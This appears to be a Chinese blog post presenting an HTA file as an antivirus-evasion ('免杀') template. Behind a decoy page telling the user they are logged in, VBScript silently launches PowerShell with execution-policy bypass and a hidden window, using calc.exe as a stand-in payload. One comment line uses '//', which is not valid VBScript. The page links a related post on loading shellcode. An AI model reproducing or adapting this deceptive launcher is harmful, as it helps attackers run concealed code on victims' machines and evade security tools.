HTA免杀

<!--xhacker.hta-->
<html>
<head>
<title>CodeWorld</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<HTA:ApplicationID="oHTA" Applicationname="hta_app" border="thin" borderstyle="normal" icon="hello.ico" maximizebutton="yes" minimizebutton="yes" showintaskbar="no" singleinstance="no" sysmenu="yes" version="777" windowstate="normal" scroll="yes">
</head>
<body>
<center>
<br>
<h1>Code World Channel</h1>
<br>
<h2>您已经登录!请关闭窗口后操作!</h2>
<br>
</center>
<script language="VBScript">
Set Hackin = CreateObject("Wscript.Shell")
Set Check = CreateObject("Scripting.FileSystemObject")
If Check.FileExists(Split(Hackin.ExpandEnvironmentStrings("%PSModulePath%"),";")(1) + "\..\powershell.exe") Then
Hackin.Run "powershell.exe -exec bypass -nop -w hidden calc.exe"
// Hackin.Run "taskkill /f /im mshta.exe"
else 
msgbox "Wrong operation, powershell.exe doesn't exist!"
End If
</script>
</body>
</html>

上一篇:C#加载shellcode


下一篇:之前用的一个多进程python爬虫